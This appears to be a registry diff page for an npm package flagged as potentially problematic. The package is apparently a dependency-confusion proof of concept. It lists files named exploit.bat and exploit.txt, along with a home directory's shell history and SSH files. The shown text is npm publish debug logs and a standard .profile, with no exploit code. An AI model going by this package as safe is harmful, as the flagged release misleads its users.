myconfusedfunctionpoctestpackage 0.0.1-security → 1.4.8

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of myconfusedfunctionpoctestpackage might be problematic. Click here for more details.

Files changed (41) hide show
  1. package/.bash_history +473 -0
  2. package/.bash_logout +7 -0
  3. package/.bashrc +117 -0
  4. package/.cache/motd.legal-displayed +0 -0
  5. package/.lesshst +1 -0
  6. package/.npm/_cacache/content-v2/sha512/1e/02/8ca5d671aedd09fe46aad1ca0f9915c8b4453b94b82d0ef6f1bc85178ec48739d7d48e5c636f746e3381200e264d9b557b449d4892a3e3482af5a13d4606 +0 -0
  7. package/.npm/_cacache/content-v2/sha512/3f/04/ef08997b683a3a38a0e540c7809512a7b3d97735be6673f877d363f0beddbd391f140150ec0baa6718f6e187ca5e8478b7cbb84febc3bfd09f39c3094a1d +0 -0
  8. package/.npm/_cacache/content-v2/sha512/4a/16/8faa498ea782a0023eddc755d462efc882d5a9e325b69ccc4d85893e8f87c8c92e335f660b37e1360e489d465c07905c9d5274e7a46fe44b420f0b16f5fd +0 -0
  9. package/.npm/_cacache/content-v2/sha512/5b/27/130f62b281d4b6e04a8f137ed0fe6199d2bbd6bf9f995eec680c463cd5f64a48cec2bd03398dda3ddce2143259267cacc31504e68817dcce69a5417a7ee6 +0 -0
  10. package/.npm/_cacache/content-v2/sha512/64/5f/2f1879d82e488c3ce4b1d7d745d9f76d047ae640603e19ac0696bafecd40631441c7a8689e12fb31aaaf82f15235beb36fb99253d749151e70d4433255aa +0 -0
  11. package/.npm/_cacache/content-v2/sha512/76/df/37ff97f3747ab4e8ea04e0a735b094e2721147da09e3daa327e0b09033f11074a838c699bb74095c385ca49154de424fe6cf476dbe3c93db692dfb902508 +0 -0
  12. package/.npm/_cacache/content-v2/sha512/7f/42/be9b1b6d875e4e55877b502e42cedf11340718730d233783f10869025da144b9f1395c4793a946e79902affab9307e1460e2aa24ac46dbf0a834af42b876 +0 -0
  13. package/.npm/_cacache/content-v2/sha512/91/0c/e10ec848de97a0223f4005e978fdd44cd6259180e25b68d13dee32a6d56a540c996136f95b974d61952d0d39df0fb554d33cc5f87d521bfb5cc6bd6abf5c +0 -0
  14. package/.npm/_cacache/content-v2/sha512/98/e7/96dac790ba81835d069f5cb61d14775f2a6206a44a4e0c92915d6abb8bb90c340f8993e38baf8d07e14af63735760a3451ab4e7f80ee46db325ec38ed5cd +0 -0
  15. package/.npm/_cacache/content-v2/sha512/b8/51/568e10b451231652e765d375bb1ae377accd82d44fd38d3a42ca3d08143e687ac673bbb88be55f179f5437258bc31f966f87abd48ed9147079416219c380 +0 -0
  16. package/.npm/_cacache/content-v2/sha512/ce/81/9b3b9666681a846f6841780233b16df192945910e5e9c78dbe8fcee1e8478cc7330d5fd658457ce728b7f67e48bffde1cb18b195c4afee3ca71a33c748ca +0 -0
  17. package/.npm/_cacache/content-v2/sha512/f5/e6/2521d117770c1133ad1691111b1354bb5803159c73136f485ae442a85c7a40ac5eb4d7d90b837dec8e34fd4fab99504dee898c0bc711e3d9ebb45d093c01 +0 -0
  18. package/.npm/_cacache/content-v2/sha512/fc/46/a337080f6bfc09d36dc38fcecb28d2d7f2fa145f3a55b75c27adc09ad9b4f928578804de633be502576c9b72f20db043aa01464998f745eaf46dcd429295 +0 -0
  19. package/.npm/_cacache/index-v5/ae/c1/794477315825298db9ca27dfd950e963043ec553246545524bbab48a0c70 +14 -0
  20. package/.npm/_logs/2025-02-26T21_38_06_101Z-debug-0.log +86 -0
  21. package/.npm/_logs/2025-02-26T21_49_29_349Z-debug-0.log +87 -0
  22. package/.npm/_logs/2025-02-27T16_37_48_349Z-debug-0.log +88 -0
  23. package/.npm/_logs/2025-02-27T18_03_12_342Z-debug-0.log +89 -0
  24. package/.npm/_logs/2025-02-27T18_26_12_973Z-debug-0.log +57 -0
  25. package/.npm/_logs/2025-02-27T18_28_39_534Z-debug-0.log +57 -0
  26. package/.npm/_logs/2025-02-27T18_31_55_677Z-debug-0.log +90 -0
  27. package/.npm/_logs/2025-02-27T18_39_48_560Z-debug-0.log +91 -0
  28. package/.npm/_logs/2025-02-27T21_34_34_074Z-debug-0.log +92 -0
  29. package/.npm/_logs/2025-02-27T21_48_43_233Z-debug-0.log +93 -0
  30. package/.npm/_logs/2025-03-03T18_07_22_042Z-debug-0.log +35 -0
  31. package/.npm/_update-notifier-last-checked +0 -0
  32. package/.profile +27 -0
  33. package/.ssh/authorized_keys +1 -0
  34. package/.ssh/known_hosts +1 -0
  35. package/.sudo_as_admin_successful +0 -0
  36. package/base.ldif +13 -0
  37. package/exploit.bat +1 -0
  38. package/exploit.txt +26 -0
  39. package/package.json +10 -4
  40. package/package.json.save +12 -0
  41. package/README.md +0 -5
package/.npm/_logs/2025-02-27T18_39_48_560Z-debug-0.log ADDED
@@ -0,0 +1,91 @@
1
+ 0 verbose cli /usr/bin/node /usr/bin/npm
2
+ 1 info using npm@9.2.0
3
+ 2 info using node@v18.19.1
4
+ 3 timing npm:load:whichnode Completed in 0ms
5
+ 4 timing config:load:defaults Completed in 3ms
6
+ 5 timing config:load:file:/usr/share/nodejs/npm/npmrc Completed in 5ms
7
+ 6 timing config:load:builtin Completed in 5ms
8
+ 7 timing config:load:cli Completed in 6ms
9
+ 8 timing config:load:env Completed in 0ms
10
+ 9 timing config:load:project Completed in 1ms
11
+ 10 timing config:load:file:/home/bigibson/.npmrc Completed in 0ms
12
+ 11 timing config:load:user Completed in 1ms
13
+ 12 timing config:load:file:/etc/npmrc Completed in 0ms
14
+ 13 timing config:load:global Completed in 0ms
15
+ 14 timing config:load:setEnvs Completed in 2ms
16
+ 15 timing config:load Completed in 20ms
17
+ 16 timing npm:load:configload Completed in 20ms
18
+ 17 timing npm:load:mkdirpcache Completed in 0ms
19
+ 18 timing npm:load:mkdirplogs Completed in 0ms
20
+ 19 verbose title npm publish
21
+ 20 verbose argv "publish" "--scope" "public" "--loglevel" "verbose"
22
+ 21 timing npm:load:setTitle Completed in 3ms
23
+ 22 timing config:load:flatten Completed in 6ms
24
+ 23 timing npm:load:display Completed in 11ms
25
+ 24 verbose logfile logs-max:10 dir:/home/bigibson/.npm/_logs/2025-02-27T18_39_48_560Z-
26
+ 25 verbose logfile /home/bigibson/.npm/_logs/2025-02-27T18_39_48_560Z-debug-0.log
27
+ 26 timing npm:load:logFile Completed in 14ms
28
+ 27 timing npm:load:timers Completed in 0ms
29
+ 28 timing npm:load:configScope Completed in 0ms
30
+ 29 timing npm:load Completed in 51ms
31
+ 30 verbose publish [ '.' ]
32
+ 31 timing config:load:flatten Completed in 1ms
33
+ 32 silly logfile start cleaning logs, removing 1 files
34
+ 33 silly logfile done cleaning log files
35
+ 34 timing arborist:ctor Completed in 1ms
36
+ 35 notice
37
+ 36 notice 📦 myconfusedfunctionpoctestpackage@1.4.5
38
+ 37 notice === Tarball Contents ===
39
+ 38 notice 14.4kB .bash_history
40
+ 38 notice 220B .bash_logout
41
+ 38 notice 3.8kB .bashrc
42
+ 38 notice 0B .cache/motd.legal-displayed
43
+ 38 notice 20B .lesshst
44
+ 38 notice 828.8kB .npm/_cacache/content-v2/sha512/1e/02/8ca5d671aedd09fe46aad1ca0f9915c8b4453b94b82d0ef6f1bc85178ec48739d7d48e5c636f746e3381200e264d9b557b449d4892a3e3482af5a13d4606
45
+ 38 notice 1.7MB .npm/_cacache/content-v2/sha512/4a/16/8faa498ea782a0023eddc755d462efc882d5a9e325b69ccc4d85893e8f87c8c92e335f660b37e1360e489d465c07905c9d5274e7a46fe44b420f0b16f5fd
46
+ 38 notice 51.4kB .npm/_cacache/content-v2/sha512/7f/42/be9b1b6d875e4e55877b502e42cedf11340718730d233783f10869025da144b9f1395c4793a946e79902affab9307e1460e2aa24ac46dbf0a834af42b876
47
+ 38 notice 103.3kB .npm/_cacache/content-v2/sha512/64/5f/2f1879d82e488c3ce4b1d7d745d9f76d047ae640603e19ac0696bafecd40631441c7a8689e12fb31aaaf82f15235beb36fb99253d749151e70d4433255aa
48
+ 38 notice 206.5kB .npm/_cacache/content-v2/sha512/76/df/37ff97f3747ab4e8ea04e0a735b094e2721147da09e3daa327e0b09033f11074a838c699bb74095c385ca49154de424fe6cf476dbe3c93db692dfb902508
49
+ 38 notice 6.6MB .npm/_cacache/content-v2/sha512/98/e7/96dac790ba81835d069f5cb61d14775f2a6206a44a4e0c92915d6abb8bb90c340f8993e38baf8d07e14af63735760a3451ab4e7f80ee46db325ec38ed5cd
50
+ 38 notice 12.0kB .npm/_cacache/content-v2/sha512/b8/51/568e10b451231652e765d375bb1ae377accd82d44fd38d3a42ca3d08143e687ac673bbb88be55f179f5437258bc31f966f87abd48ed9147079416219c380
51
+ 38 notice 414.1kB .npm/_cacache/content-v2/sha512/ce/81/9b3b9666681a846f6841780233b16df192945910e5e9c78dbe8fcee1e8478cc7330d5fd658457ce728b7f67e48bffde1cb18b195c4afee3ca71a33c748ca
52
+ 38 notice 3.3MB .npm/_cacache/content-v2/sha512/f5/e6/2521d117770c1133ad1691111b1354bb5803159c73136f485ae442a85c7a40ac5eb4d7d90b837dec8e34fd4fab99504dee898c0bc711e3d9ebb45d093c01
53
+ 38 notice 25.0kB .npm/_cacache/content-v2/sha512/fc/46/a337080f6bfc09d36dc38fcecb28d2d7f2fa145f3a55b75c27adc09ad9b4f928578804de633be502576c9b72f20db043aa01464998f745eaf46dcd429295
54
+ 38 notice 2.3kB .npm/_cacache/index-v5/ae/c1/794477315825298db9ca27dfd950e963043ec553246545524bbab48a0c70
55
+ 38 notice 7.9kB .npm/_logs/2025-02-26T17_40_49_914Z-debug-0.log
56
+ 38 notice 8.0kB .npm/_logs/2025-02-26T17_45_09_793Z-debug-0.log
57
+ 38 notice 8.2kB .npm/_logs/2025-02-26T21_24_35_080Z-debug-0.log
58
+ 38 notice 8.4kB .npm/_logs/2025-02-26T21_38_06_101Z-debug-0.log
59
+ 38 notice 8.6kB .npm/_logs/2025-02-26T21_49_29_349Z-debug-0.log
60
+ 38 notice 8.8kB .npm/_logs/2025-02-27T16_37_48_349Z-debug-0.log
61
+ 38 notice 9.0kB .npm/_logs/2025-02-27T18_03_12_342Z-debug-0.log
62
+ 38 notice 3.0kB .npm/_logs/2025-02-27T18_26_12_973Z-debug-0.log
63
+ 38 notice 3.0kB .npm/_logs/2025-02-27T18_28_39_534Z-debug-0.log
64
+ 38 notice 9.1kB .npm/_logs/2025-02-27T18_31_55_677Z-debug-0.log
65
+ 38 notice 1.7kB .npm/_logs/2025-02-27T18_39_48_560Z-debug-0.log
66
+ 38 notice 0B .npm/_update-notifier-last-checked
67
+ 38 notice 807B .profile
68
+ 38 notice 100B .ssh/authorized_keys
69
+ 38 notice 142B .ssh/known_hosts
70
+ 38 notice 0B .sudo_as_admin_successful
71
+ 38 notice 327B base.ldif
72
+ 38 notice 377B exploit.bat
73
+ 38 notice 3.8kB exploit.txt
74
+ 38 notice 415B package.json
75
+ 38 notice 289B package.json.save
76
+ 39 notice === Tarball Details ===
77
+ 40 notice name: myconfusedfunctionpoctestpackage
78
+ 40 notice version: 1.4.5
79
+ 40 notice filename: myconfusedfunctionpoctestpackage-1.4.5.tgz
80
+ 40 notice package size: 13.3 MB
81
+ 40 notice unpacked size: 13.4 MB
82
+ 40 notice shasum: 39c542d93a6a93541dc4d92ea0d71242f019048e
83
+ 40 notice integrity: sha512-PwTvCJl7aDo6O[...]8O/0J85wwlKHQ==
84
+ 40 notice total files: 37
85
+ 41 notice
86
+ 42 notice Publishing to https://registry.npmjs.org/ with tag latest and default access
87
+ 43 http fetch PUT 200 https://registry.npmjs.org/myconfusedfunctionpoctestpackage 2698ms
88
+ 44 timing command:publish Completed in 3866ms
89
+ 45 verbose exit 0
90
+ 46 timing npm Completed in 3949ms
91
+ 47 info ok
package/.npm/_logs/2025-02-27T21_34_34_074Z-debug-0.log ADDED
@@ -0,0 +1,92 @@
1
+ 0 verbose cli /usr/bin/node /usr/bin/npm
2
+ 1 info using npm@9.2.0
3
+ 2 info using node@v18.19.1
4
+ 3 timing npm:load:whichnode Completed in 0ms
5
+ 4 timing config:load:defaults Completed in 3ms
6
+ 5 timing config:load:file:/usr/share/nodejs/npm/npmrc Completed in 4ms
7
+ 6 timing config:load:builtin Completed in 4ms
8
+ 7 timing config:load:cli Completed in 4ms
9
+ 8 timing config:load:env Completed in 0ms
10
+ 9 timing config:load:project Completed in 2ms
11
+ 10 timing config:load:file:/home/bigibson/.npmrc Completed in 1ms
12
+ 11 timing config:load:user Completed in 1ms
13
+ 12 timing config:load:file:/etc/npmrc Completed in 0ms
14
+ 13 timing config:load:global Completed in 1ms
15
+ 14 timing config:load:setEnvs Completed in 2ms
16
+ 15 timing config:load Completed in 18ms
17
+ 16 timing npm:load:configload Completed in 19ms
18
+ 17 timing npm:load:mkdirpcache Completed in 2ms
19
+ 18 timing npm:load:mkdirplogs Completed in 1ms
20
+ 19 verbose title npm publish
21
+ 20 verbose argv "publish" "--scope" "public" "--loglevel" "verbose"
22
+ 21 timing npm:load:setTitle Completed in 3ms
23
+ 22 timing config:load:flatten Completed in 8ms
24
+ 23 timing npm:load:display Completed in 14ms
25
+ 24 verbose logfile logs-max:10 dir:/home/bigibson/.npm/_logs/2025-02-27T21_34_34_074Z-
26
+ 25 verbose logfile /home/bigibson/.npm/_logs/2025-02-27T21_34_34_074Z-debug-0.log
27
+ 26 timing npm:load:logFile Completed in 14ms
28
+ 27 timing npm:load:timers Completed in 0ms
29
+ 28 timing npm:load:configScope Completed in 0ms
30
+ 29 timing npm:load Completed in 55ms
31
+ 30 verbose publish [ '.' ]
32
+ 31 timing config:load:flatten Completed in 1ms
33
+ 32 silly logfile start cleaning logs, removing 1 files
34
+ 33 silly logfile done cleaning log files
35
+ 34 timing arborist:ctor Completed in 1ms
36
+ 35 notice
37
+ 36 notice 📦 myconfusedfunctionpoctestpackage@1.4.6
38
+ 37 notice === Tarball Contents ===
39
+ 38 notice 14.4kB .bash_history
40
+ 38 notice 220B .bash_logout
41
+ 38 notice 3.8kB .bashrc
42
+ 38 notice 0B .cache/motd.legal-displayed
43
+ 38 notice 20B .lesshst
44
+ 38 notice 828.8kB .npm/_cacache/content-v2/sha512/1e/02/8ca5d671aedd09fe46aad1ca0f9915c8b4453b94b82d0ef6f1bc85178ec48739d7d48e5c636f746e3381200e264d9b557b449d4892a3e3482af5a13d4606
45
+ 38 notice 13.3MB .npm/_cacache/content-v2/sha512/3f/04/ef08997b683a3a38a0e540c7809512a7b3d97735be6673f877d363f0beddbd391f140150ec0baa6718f6e187ca5e8478b7cbb84febc3bfd09f39c3094a1d
46
+ 38 notice 1.7MB .npm/_cacache/content-v2/sha512/4a/16/8faa498ea782a0023eddc755d462efc882d5a9e325b69ccc4d85893e8f87c8c92e335f660b37e1360e489d465c07905c9d5274e7a46fe44b420f0b16f5fd
47
+ 38 notice 51.4kB .npm/_cacache/content-v2/sha512/7f/42/be9b1b6d875e4e55877b502e42cedf11340718730d233783f10869025da144b9f1395c4793a946e79902affab9307e1460e2aa24ac46dbf0a834af42b876
48
+ 38 notice 103.3kB .npm/_cacache/content-v2/sha512/64/5f/2f1879d82e488c3ce4b1d7d745d9f76d047ae640603e19ac0696bafecd40631441c7a8689e12fb31aaaf82f15235beb36fb99253d749151e70d4433255aa
49
+ 38 notice 206.5kB .npm/_cacache/content-v2/sha512/76/df/37ff97f3747ab4e8ea04e0a735b094e2721147da09e3daa327e0b09033f11074a838c699bb74095c385ca49154de424fe6cf476dbe3c93db692dfb902508
50
+ 38 notice 6.6MB .npm/_cacache/content-v2/sha512/98/e7/96dac790ba81835d069f5cb61d14775f2a6206a44a4e0c92915d6abb8bb90c340f8993e38baf8d07e14af63735760a3451ab4e7f80ee46db325ec38ed5cd
51
+ 38 notice 12.0kB .npm/_cacache/content-v2/sha512/b8/51/568e10b451231652e765d375bb1ae377accd82d44fd38d3a42ca3d08143e687ac673bbb88be55f179f5437258bc31f966f87abd48ed9147079416219c380
52
+ 38 notice 414.1kB .npm/_cacache/content-v2/sha512/ce/81/9b3b9666681a846f6841780233b16df192945910e5e9c78dbe8fcee1e8478cc7330d5fd658457ce728b7f67e48bffde1cb18b195c4afee3ca71a33c748ca
53
+ 38 notice 3.3MB .npm/_cacache/content-v2/sha512/f5/e6/2521d117770c1133ad1691111b1354bb5803159c73136f485ae442a85c7a40ac5eb4d7d90b837dec8e34fd4fab99504dee898c0bc711e3d9ebb45d093c01
54
+ 38 notice 25.0kB .npm/_cacache/content-v2/sha512/fc/46/a337080f6bfc09d36dc38fcecb28d2d7f2fa145f3a55b75c27adc09ad9b4f928578804de633be502576c9b72f20db043aa01464998f745eaf46dcd429295
55
+ 38 notice 2.5kB .npm/_cacache/index-v5/ae/c1/794477315825298db9ca27dfd950e963043ec553246545524bbab48a0c70
56
+ 38 notice 8.0kB .npm/_logs/2025-02-26T17_45_09_793Z-debug-0.log
57
+ 38 notice 8.2kB .npm/_logs/2025-02-26T21_24_35_080Z-debug-0.log
58
+ 38 notice 8.4kB .npm/_logs/2025-02-26T21_38_06_101Z-debug-0.log
59
+ 38 notice 8.6kB .npm/_logs/2025-02-26T21_49_29_349Z-debug-0.log
60
+ 38 notice 8.8kB .npm/_logs/2025-02-27T16_37_48_349Z-debug-0.log
61
+ 38 notice 9.0kB .npm/_logs/2025-02-27T18_03_12_342Z-debug-0.log
62
+ 38 notice 3.0kB .npm/_logs/2025-02-27T18_26_12_973Z-debug-0.log
63
+ 38 notice 3.0kB .npm/_logs/2025-02-27T18_28_39_534Z-debug-0.log
64
+ 38 notice 9.1kB .npm/_logs/2025-02-27T18_31_55_677Z-debug-0.log
65
+ 38 notice 9.3kB .npm/_logs/2025-02-27T18_39_48_560Z-debug-0.log
66
+ 38 notice 1.7kB .npm/_logs/2025-02-27T21_34_34_074Z-debug-0.log
67
+ 38 notice 0B .npm/_update-notifier-last-checked
68
+ 38 notice 807B .profile
69
+ 38 notice 100B .ssh/authorized_keys
70
+ 38 notice 142B .ssh/known_hosts
71
+ 38 notice 0B .sudo_as_admin_successful
72
+ 38 notice 327B base.ldif
73
+ 38 notice 377B exploit.bat
74
+ 38 notice 3.8kB exploit.txt
75
+ 38 notice 352B package.json
76
+ 38 notice 289B package.json.save
77
+ 39 notice === Tarball Details ===
78
+ 40 notice name: myconfusedfunctionpoctestpackage
79
+ 40 notice version: 1.4.6
80
+ 40 notice filename: myconfusedfunctionpoctestpackage-1.4.6.tgz
81
+ 40 notice package size: 26.6 MB
82
+ 40 notice unpacked size: 26.6 MB
83
+ 40 notice shasum: 997e841f307f3b25fdee7e2ad63788291a3c6c4d
84
+ 40 notice integrity: sha512-kQzhDshI3pegI[...]VIb+1zGvWq/XA==
85
+ 40 notice total files: 38
86
+ 41 notice
87
+ 42 notice Publishing to https://registry.npmjs.org/ with tag latest and default access
88
+ 43 http fetch PUT 200 https://registry.npmjs.org/myconfusedfunctionpoctestpackage 3557ms
89
+ 44 timing command:publish Completed in 5695ms
90
+ 45 verbose exit 0
91
+ 46 timing npm Completed in 5781ms
92
+ 47 info ok
package/.npm/_logs/2025-02-27T21_48_43_233Z-debug-0.log ADDED
@@ -0,0 +1,93 @@
1
+ 0 verbose cli /usr/bin/node /usr/bin/npm
2
+ 1 info using npm@9.2.0
3
+ 2 info using node@v18.19.1
4
+ 3 timing npm:load:whichnode Completed in 1ms
5
+ 4 timing config:load:defaults Completed in 4ms
6
+ 5 timing config:load:file:/usr/share/nodejs/npm/npmrc Completed in 4ms
7
+ 6 timing config:load:builtin Completed in 4ms
8
+ 7 timing config:load:cli Completed in 7ms
9
+ 8 timing config:load:env Completed in 1ms
10
+ 9 timing config:load:project Completed in 2ms
11
+ 10 timing config:load:file:/home/bigibson/.npmrc Completed in 1ms
12
+ 11 timing config:load:user Completed in 1ms
13
+ 12 timing config:load:file:/etc/npmrc Completed in 0ms
14
+ 13 timing config:load:global Completed in 0ms
15
+ 14 timing config:load:setEnvs Completed in 1ms
16
+ 15 timing config:load Completed in 23ms
17
+ 16 timing npm:load:configload Completed in 23ms
18
+ 17 timing npm:load:mkdirpcache Completed in 0ms
19
+ 18 timing npm:load:mkdirplogs Completed in 0ms
20
+ 19 verbose title npm publish
21
+ 20 verbose argv "publish" "--scope" "public" "--loglevel" "verbose"
22
+ 21 timing npm:load:setTitle Completed in 2ms
23
+ 22 timing config:load:flatten Completed in 8ms
24
+ 23 timing npm:load:display Completed in 15ms
25
+ 24 verbose logfile logs-max:10 dir:/home/bigibson/.npm/_logs/2025-02-27T21_48_43_233Z-
26
+ 25 verbose logfile /home/bigibson/.npm/_logs/2025-02-27T21_48_43_233Z-debug-0.log
27
+ 26 timing npm:load:logFile Completed in 16ms
28
+ 27 timing npm:load:timers Completed in 0ms
29
+ 28 timing npm:load:configScope Completed in 1ms
30
+ 29 timing npm:load Completed in 60ms
31
+ 30 verbose publish [ '.' ]
32
+ 31 timing config:load:flatten Completed in 1ms
33
+ 32 silly logfile start cleaning logs, removing 1 files
34
+ 33 silly logfile done cleaning log files
35
+ 34 timing arborist:ctor Completed in 1ms
36
+ 35 notice
37
+ 36 notice 📦 myconfusedfunctionpoctestpackage@1.4.7
38
+ 37 notice === Tarball Contents ===
39
+ 38 notice 14.4kB .bash_history
40
+ 38 notice 220B .bash_logout
41
+ 38 notice 3.8kB .bashrc
42
+ 38 notice 0B .cache/motd.legal-displayed
43
+ 38 notice 20B .lesshst
44
+ 38 notice 828.8kB .npm/_cacache/content-v2/sha512/1e/02/8ca5d671aedd09fe46aad1ca0f9915c8b4453b94b82d0ef6f1bc85178ec48739d7d48e5c636f746e3381200e264d9b557b449d4892a3e3482af5a13d4606
45
+ 38 notice 13.3MB .npm/_cacache/content-v2/sha512/3f/04/ef08997b683a3a38a0e540c7809512a7b3d97735be6673f877d363f0beddbd391f140150ec0baa6718f6e187ca5e8478b7cbb84febc3bfd09f39c3094a1d
46
+ 38 notice 1.7MB .npm/_cacache/content-v2/sha512/4a/16/8faa498ea782a0023eddc755d462efc882d5a9e325b69ccc4d85893e8f87c8c92e335f660b37e1360e489d465c07905c9d5274e7a46fe44b420f0b16f5fd
47
+ 38 notice 51.4kB .npm/_cacache/content-v2/sha512/7f/42/be9b1b6d875e4e55877b502e42cedf11340718730d233783f10869025da144b9f1395c4793a946e79902affab9307e1460e2aa24ac46dbf0a834af42b876
48
+ 38 notice 103.3kB .npm/_cacache/content-v2/sha512/64/5f/2f1879d82e488c3ce4b1d7d745d9f76d047ae640603e19ac0696bafecd40631441c7a8689e12fb31aaaf82f15235beb36fb99253d749151e70d4433255aa
49
+ 38 notice 206.5kB .npm/_cacache/content-v2/sha512/76/df/37ff97f3747ab4e8ea04e0a735b094e2721147da09e3daa327e0b09033f11074a838c699bb74095c385ca49154de424fe6cf476dbe3c93db692dfb902508
50
+ 38 notice 26.6MB .npm/_cacache/content-v2/sha512/91/0c/e10ec848de97a0223f4005e978fdd44cd6259180e25b68d13dee32a6d56a540c996136f95b974d61952d0d39df0fb554d33cc5f87d521bfb5cc6bd6abf5c
51
+ 38 notice 6.6MB .npm/_cacache/content-v2/sha512/98/e7/96dac790ba81835d069f5cb61d14775f2a6206a44a4e0c92915d6abb8bb90c340f8993e38baf8d07e14af63735760a3451ab4e7f80ee46db325ec38ed5cd
52
+ 38 notice 12.0kB .npm/_cacache/content-v2/sha512/b8/51/568e10b451231652e765d375bb1ae377accd82d44fd38d3a42ca3d08143e687ac673bbb88be55f179f5437258bc31f966f87abd48ed9147079416219c380
53
+ 38 notice 414.1kB .npm/_cacache/content-v2/sha512/ce/81/9b3b9666681a846f6841780233b16df192945910e5e9c78dbe8fcee1e8478cc7330d5fd658457ce728b7f67e48bffde1cb18b195c4afee3ca71a33c748ca
54
+ 38 notice 3.3MB .npm/_cacache/content-v2/sha512/f5/e6/2521d117770c1133ad1691111b1354bb5803159c73136f485ae442a85c7a40ac5eb4d7d90b837dec8e34fd4fab99504dee898c0bc711e3d9ebb45d093c01
55
+ 38 notice 25.0kB .npm/_cacache/content-v2/sha512/fc/46/a337080f6bfc09d36dc38fcecb28d2d7f2fa145f3a55b75c27adc09ad9b4f928578804de633be502576c9b72f20db043aa01464998f745eaf46dcd429295
56
+ 38 notice 2.8kB .npm/_cacache/index-v5/ae/c1/794477315825298db9ca27dfd950e963043ec553246545524bbab48a0c70
57
+ 38 notice 8.2kB .npm/_logs/2025-02-26T21_24_35_080Z-debug-0.log
58
+ 38 notice 8.4kB .npm/_logs/2025-02-26T21_38_06_101Z-debug-0.log
59
+ 38 notice 8.6kB .npm/_logs/2025-02-26T21_49_29_349Z-debug-0.log
60
+ 38 notice 8.8kB .npm/_logs/2025-02-27T16_37_48_349Z-debug-0.log
61
+ 38 notice 9.0kB .npm/_logs/2025-02-27T18_03_12_342Z-debug-0.log
62
+ 38 notice 3.0kB .npm/_logs/2025-02-27T18_26_12_973Z-debug-0.log
63
+ 38 notice 3.0kB .npm/_logs/2025-02-27T18_28_39_534Z-debug-0.log
64
+ 38 notice 9.1kB .npm/_logs/2025-02-27T18_31_55_677Z-debug-0.log
65
+ 38 notice 9.3kB .npm/_logs/2025-02-27T18_39_48_560Z-debug-0.log
66
+ 38 notice 9.5kB .npm/_logs/2025-02-27T21_34_34_074Z-debug-0.log
67
+ 38 notice 1.7kB .npm/_logs/2025-02-27T21_48_43_233Z-debug-0.log
68
+ 38 notice 0B .npm/_update-notifier-last-checked
69
+ 38 notice 807B .profile
70
+ 38 notice 100B .ssh/authorized_keys
71
+ 38 notice 142B .ssh/known_hosts
72
+ 38 notice 0B .sudo_as_admin_successful
73
+ 38 notice 327B base.ldif
74
+ 38 notice 377B exploit.bat
75
+ 38 notice 3.8kB exploit.txt
76
+ 38 notice 347B package.json
77
+ 38 notice 289B package.json.save
78
+ 39 notice === Tarball Details ===
79
+ 40 notice name: myconfusedfunctionpoctestpackage
80
+ 40 notice version: 1.4.7
81
+ 40 notice filename: myconfusedfunctionpoctestpackage-1.4.7.tgz
82
+ 40 notice package size: 53.1 MB
83
+ 40 notice unpacked size: 53.2 MB
84
+ 40 notice shasum: 70f162164fc308b7d6fd27441f8211b2fa1b675f
85
+ 40 notice integrity: sha512-WycTD2KygdS24[...]BfczmmlQXp+5g==
86
+ 40 notice total files: 39
87
+ 41 notice
88
+ 42 notice Publishing to https://registry.npmjs.org/ with tag latest and default access
89
+ 43 http fetch PUT 200 https://registry.npmjs.org/myconfusedfunctionpoctestpackage 5818ms
90
+ 44 timing command:publish Completed in 9595ms
91
+ 45 verbose exit 0
92
+ 46 timing npm Completed in 9686ms
93
+ 47 info ok
package/.npm/_logs/2025-03-03T18_07_22_042Z-debug-0.log ADDED
@@ -0,0 +1,35 @@
1
+ 0 verbose cli /usr/bin/node /usr/bin/npm
2
+ 1 info using npm@9.2.0
3
+ 2 info using node@v18.19.1
4
+ 3 timing npm:load:whichnode Completed in 0ms
5
+ 4 timing config:load:defaults Completed in 3ms
6
+ 5 timing config:load:file:/usr/share/nodejs/npm/npmrc Completed in 3ms
7
+ 6 timing config:load:builtin Completed in 4ms
8
+ 7 timing config:load:cli Completed in 4ms
9
+ 8 timing config:load:env Completed in 1ms
10
+ 9 timing config:load:project Completed in 1ms
11
+ 10 timing config:load:file:/home/bigibson/.npmrc Completed in 0ms
12
+ 11 timing config:load:user Completed in 0ms
13
+ 12 timing config:load:file:/etc/npmrc Completed in 0ms
14
+ 13 timing config:load:global Completed in 0ms
15
+ 14 timing config:load:setEnvs Completed in 1ms
16
+ 15 timing config:load Completed in 18ms
17
+ 16 timing npm:load:configload Completed in 18ms
18
+ 17 timing npm:load:mkdirpcache Completed in 0ms
19
+ 18 timing npm:load:mkdirplogs Completed in 0ms
20
+ 19 verbose title npm publish
21
+ 20 verbose argv "publish" "--scope" "public" "--loglevel" "verbose"
22
+ 21 timing npm:load:setTitle Completed in 3ms
23
+ 22 timing config:load:flatten Completed in 7ms
24
+ 23 timing npm:load:display Completed in 12ms
25
+ 24 verbose logfile logs-max:10 dir:/home/bigibson/.npm/_logs/2025-03-03T18_07_22_042Z-
26
+ 25 verbose logfile /home/bigibson/.npm/_logs/2025-03-03T18_07_22_042Z-debug-0.log
27
+ 26 timing npm:load:logFile Completed in 16ms
28
+ 27 timing npm:load:timers Completed in 0ms
29
+ 28 timing npm:load:configScope Completed in 1ms
30
+ 29 timing npm:load Completed in 53ms
31
+ 30 verbose publish [ '.' ]
32
+ 31 timing config:load:flatten Completed in 1ms
33
+ 32 silly logfile start cleaning logs, removing 1 files
34
+ 33 silly logfile done cleaning log files
35
+ 34 timing arborist:ctor Completed in 1ms
package/.npm/_update-notifier-last-checked ADDED
File without changes
package/.profile ADDED
@@ -0,0 +1,27 @@
1
+ # ~/.profile: executed by the command interpreter for login shells.
2
+ # This file is not read by bash(1), if ~/.bash_profile or ~/.bash_login
3
+ # exists.
4
+ # see /usr/share/doc/bash/examples/startup-files for examples.
5
+ # the files are located in the bash-doc package.
6
+
7
+ # the default umask is set in /etc/profile; for setting the umask
8
+ # for ssh logins, install and configure the libpam-umask package.
9
+ #umask 022
10
+
11
+ # if running bash
12
+ if [ -n "$BASH_VERSION" ]; then
13
+ # include .bashrc if it exists
14
+ if [ -f "$HOME/.bashrc" ]; then
15
+ . "$HOME/.bashrc"
16
+ fi
17
+ fi
18
+
19
+ # set PATH so it includes user's private bin if it exists
20
+ if [ -d "$HOME/bin" ] ; then
21
+ PATH="$HOME/bin:$PATH"
22
+ fi
23
+
24
+ # set PATH so it includes user's private bin if it exists
25
+ if [ -d "$HOME/.local/bin" ] ; then
26
+ PATH="$HOME/.local/bin:$PATH"
27
+ fi
